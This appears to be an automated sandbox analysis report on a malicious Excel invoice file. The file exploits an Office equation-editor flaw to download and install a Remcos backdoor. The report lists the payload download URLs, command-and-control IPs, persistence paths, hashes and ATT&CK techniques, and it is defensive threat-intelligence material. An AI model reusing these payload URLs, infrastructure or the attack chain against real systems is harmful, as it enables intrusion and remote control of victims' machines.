              Source: Yara matchFile source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00876283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00876283
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00876747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00876747
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013D6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,6_2_013D6283
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013D6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_013D6747

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information211
              Scripting              		2
              Valid Accounts              		2
              Native API              		211
              Scripting              		1
              Exploitation for Privilege Escalation              		1
              Disable or Modify Tools              		21
              Input Capture              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		23
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts33
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop Protocol21
              Input Capture              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts              		2
              Valid Accounts              		21
              Obfuscated Files or Information              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron2
              Registry Run Keys / Startup Folder              		21
              Access Token Manipulation              		1
              Install Root Certificate              		NTDS17
              System Information Discovery              		Distributed Component Object ModelInput Capture113
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
              Process Injection              		1
              Software Packing              		LSA Secrets13
              Security Software Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		Cached Domain Credentials1
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
              Valid Accounts              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Modify Registry              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Virtualization/Sandbox Evasion              		Network Sniffing1
              Remote System Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
              Access Token Manipulation              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task12
              Process Injection              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572126 Sample: FACTURA.xlsx Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 78 192.210.150.26 AS-COLOCROSSINGUS United States 2->78 90 Found malware configuration 2->90 92 Malicious sample detected (through community Yara rule) 2->92 94 Antivirus / Scanner detection for submitted sample 2->94 96 17 other signatures 2->96 15 EXCEL.EXE 7 11 2->15         started        18 wscript.exe 1 2->18         started        signatures3 process4 file5 76 C:\Users\user\Desktop\~$FACTURA.xlsx, data 15->76 dropped 21 EQNEDT32.EXE 12 15->21         started        86 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->86 26 outvaunts.exe 18->26         started        signatures6 process7 dnsIp8 80 grupodulcemar.pe 161.132.57.101, 443, 49163 RedCientificaPeruanaPE Peru 21->80 82 www.grupodulcemar.pe 21->82 70 C:\Users\user\AppData\Local\Temp\kudo.exe, PE32 21->70 dropped 72 C:\Users\user\...\HKP098767890HJ[1].exe, PE32 21->72 dropped 104 Installs new ROOT certificates 21->104 106 Office equation editor establishes network connection 21->106 108 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 21->108 28 kudo.exe 6 21->28         started        110 Binary is likely a compiled AutoIt script file 26->110 32 outvaunts.exe 26->32         started        file9 signatures10 process11 file12 74 C:\Users\user\AppData\Local\...\outvaunts.exe, PE32 28->74 dropped 118 Multi AV Scanner detection for dropped file 28->118 120 Binary is likely a compiled AutoIt script file 28->120 34 outvaunts.exe 3 28->34         started        38 outvaunts.exe 32->38         started        signatures13 process14 file15 68 C:\Users\user\AppData\...\outvaunts.vbs, data 34->68 dropped 98 Multi AV Scanner detection for dropped file 34->98 100 Binary is likely a compiled AutoIt script file 34->100 102 Drops VBS files to the startup folder 34->102 40 outvaunts.exe 2 34->40         started        43 outvaunts.exe 38->43         started        signatures16 process17 signatures18 114 Binary is likely a compiled AutoIt script file 40->114 45 outvaunts.exe 2 40->45         started        48 outvaunts.exe 43->48         started        process19 signatures20 122 Binary is likely a compiled AutoIt script file 45->122 50 outvaunts.exe 2 45->50         started        53 outvaunts.exe 48->53         started        process21 signatures22 88 Binary is likely a compiled AutoIt script file 50->88 55 outvaunts.exe 2 50->55         started        58 outvaunts.exe 53->58         started        process23 signatures24 112 Binary is likely a compiled AutoIt script file 55->112 60 outvaunts.exe 2 55->60         started        63 outvaunts.exe 58->63         started        process25 signatures26 116 Binary is likely a compiled AutoIt script file 60->116 65 outvaunts.exe 2 60->65         started        process27 signatures28 84 Binary is likely a compiled AutoIt script file 65->84

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              FACTURA.xlsx63%ReversingLabsDocument-Excel.Exploit.CVE-2018-0798
              FACTURA.xlsx45%VirustotalBrowse
              FACTURA.xlsx100%AviraEXP/CVE-2018-0798.Gen

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exe58%ReversingLabsWin32.Backdoor.Remcos
              C:\Users\user\AppData\Local\Temp\kudo.exe58%ReversingLabsWin32.Backdoor.Remcos
              C:\Users\user\AppData\Local\complacence\outvaunts.exe58%ReversingLabsWin32.Backdoor.Remcos

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://www.grupodulcemar.pe/0%Avira URL Cloudsafe
              https://www.grupodulcemar.pe/HKP098767890HJ.exe0%Avira URL Cloudsafe
              https://www.grupodulcemar.pe/HKP098767890HJ.exessC:0%Avira URL Cloudsafe
              https://www.grupodulcemar.pe/HKP098767890HJ.exej0%Avira URL Cloudsafe
              https://www.grupodulcemar.pe/m0%Avira URL Cloudsafe
              https://www.grupodulcemar.pe/HKP098767890HJ.exek0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              grupodulcemar.pe
              		161.132.57.101
              		truetrue
                		unknown
                www.grupodulcemar.pe
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://www.grupodulcemar.pe/HKP098767890HJ.exetrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://geoplugin.net/json.gp/Coutvaunts.exe, 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.grupodulcemar.pe/EQNEDT32.EXE, 00000002.00000002.456047137.000000000066B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.grupodulcemar.pe/HKP098767890HJ.exessC:EQNEDT32.EXE, 00000002.00000002.456047137.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.grupodulcemar.pe/HKP098767890HJ.exejEQNEDT32.EXE, 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.grupodulcemar.pe/mEQNEDT32.EXE, 00000002.00000002.456047137.000000000066B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.grupodulcemar.pe/HKP098767890HJ.exekEQNEDT32.EXE, 00000002.00000002.456047137.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    161.132.57.101
                                    		grupodulcemar.pePeru
                                    		3132RedCientificaPeruanaPEtrue
                                    192.210.150.26
                                    		unknownUnited States
                                    		36352AS-COLOCROSSINGUStrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1572126
                                    Start date and time:2024-12-10 07:03:18 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 10m 55s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:40
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:FACTURA.xlsx
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLSX@73/75@1/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 71
                                    • Number of non-executed functions: 272
                                    Cookbook Comments:
                                    • Found application associated with file extension: .xlsx
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Active ActiveX Object
                                    • Scroll down
                                    • Close Viewer

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    01:04:52API Interceptor144x Sleep call for process: EQNEDT32.EXE modified
                                    01:05:09API Interceptor6x Sleep call for process: wscript.exe modified
                                    22:05:00AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    161.132.57.101FACTURA9876567800.docx.docGet hashmaliciousLokibotBrowse
                                    • www.grupodulcemar.pe/FACTURA09876567000.bat
                                    192.210.150.267056ZCiFdE.exeGet hashmaliciousRemcosBrowse
                                      uIarPolvHR.exeGet hashmaliciousRemcosBrowse
                                        IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                          z49FACTURA-0987678.exeGet hashmaliciousRemcosBrowse
                                            FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                              Rgh99876k7e.exeGet hashmaliciousRemcosBrowse
                                                SALKI098765R400.exeGet hashmaliciousRemcosBrowse
                                                  FTE98767800000.bat.exeGet hashmaliciousRemcosBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    RedCientificaPeruanaPEsh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 161.132.169.85
                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 200.1.176.62
                                                    FACTURA9876567800.docx.docGet hashmaliciousLokibotBrowse
                                                    • 161.132.57.101
                                                    8UUxoKYpTx.elfGet hashmaliciousMiraiBrowse
                                                    • 209.45.71.128
                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                    • 161.132.159.203
                                                    20508667001 Envo de Comprobante de Documento Electrnico FB13-13344615.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                    • 161.132.57.102
                                                    PO 28014399.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                    • 161.132.57.102
                                                    Orden de Compra No. 00501.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                    • 161.132.57.102
                                                    PO 28014399.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                    • 161.132.57.102
                                                    Factura_N21_092680370923.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                    • 161.132.57.102
                                                    AS-COLOCROSSINGUSOrden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                    • 172.245.142.60
                                                    OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                    • 172.245.123.29
                                                    OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                    • 172.245.123.29
                                                    OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                    • 172.245.123.29
                                                    Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                    • 104.168.7.16
                                                    7056ZCiFdE.exeGet hashmaliciousRemcosBrowse
                                                    • 192.210.150.26
                                                    uIarPolvHR.exeGet hashmaliciousRemcosBrowse
                                                    • 192.210.150.26
                                                    IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                                    • 192.210.150.26
                                                    meerkat.x86.elfGet hashmaliciousMiraiBrowse
                                                    • 104.168.61.38
                                                    CGDL.docGet hashmaliciousUnknownBrowse
                                                    • 192.3.172.208

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    7dcce5b76c8b17472d024758970a406bEstado_de_cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                    • 161.132.57.101
                                                    Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                    • 161.132.57.101
                                                    OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                    • 161.132.57.101
                                                    plb2ptcqcI.docGet hashmaliciousXenoRATBrowse
                                                    • 161.132.57.101
                                                    OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                    • 161.132.57.101
                                                    Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                    • 161.132.57.101
                                                    dHrrqccwkL.docGet hashmaliciousXenoRATBrowse
                                                    • 161.132.57.101
                                                    zVUq6L4FrV.docGet hashmaliciousXenoRATBrowse
                                                    • 161.132.57.101
                                                    Estado de cuenta.xlsGet hashmaliciousXenoRATBrowse
                                                    • 161.132.57.101
                                                    Estado de cuenta.xlsGet hashmaliciousUnknownBrowse
                                                    • 161.132.57.101

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exe

                                                    Download File
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                    Category:dropped
                                                    Size (bytes):832512
                                                    Entropy (8bit):7.982751682789903
                                                    Encrypted:false
                                                    SSDEEP:24576:Erl6kD68JmlotQfXTwzecW/wCyFbxXdRC:yl328U2yfdcZFFd
                                                    MD5:D6B16370CD4E60185AA88607316A0C05
                                                    SHA1:7FBC63B1203617C67E5491745BEAEDB424BAED78
                                                    SHA-256:A6D6D1C8299F97F966D72373E999B5A8E6768914E27D5533307CF6878B95DCE2
                                                    SHA-512:16C468948E568343AB1A1460D82B4C5859D09043E3A0115AA9C0AEFEABFA22C796CCA505EDE8B1F194764DDA7C5263979230E3FA272EE1FB3B21919202B01906
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...v.Wg.........."......`...`...p..0.............@..........................@............@...@.......@......................-..$........M...................1..........................................H...........................................UPX0.....p..............................UPX1.....`.......^..................@....rsrc....`.......R...b..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A338A6AB.emf

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):169096
                                                    Entropy (8bit):3.369564690022728
                                                    Encrypted:false
                                                    SSDEEP:1536:WK83moqvL5TWvyvcSg2JjEeSxqLY5ml1re71NmWqnb11ruEA9TAe:WF3H2t4Sg2JjEWE5mSZB
                                                    MD5:DCF8C56CAB759D132AD0B11703B8015C
                                                    SHA1:C656AF02D26A18CE716A28C36B34BEE75D00E2B4
                                                    SHA-256:38F17A599AC5D645DF3840BBB401710EF81573A747DA20ABBFC1B7D9A9273B58
                                                    SHA-512:F6A9BAEA096279DBDBFD370B26899D259ED6B6DAFA8042594389523EA210CBECDC14ADD78AB7568E1C3EC8C0DF7AFCCAAD0ED7E22A879F6023C8317B6712973C
                                                    Malicious:false
                                                    Preview:....l...........[...y...........%...J... EMF................................@.......................0]..8...Q...............[...y...................\...z...P...(...x........... ...\...z...(...Z...z..... .......................................................................................................................]..V...e,..g...\ ..Q...[...M...]!..V...Q...W...\...h/..i1..Y...\...L...Y...^"..M..~G..}G..}F..}F..}F..}F..}F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..}G...L......................................................................{{{..................................................................................................................................................................................................................................................................................................N...S...S...S...W...X...g...h0..Y...T...W...O...^"..b(..M...M..._$.

                                                    C:\Users\user\AppData\Local\Temp\aut1278.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
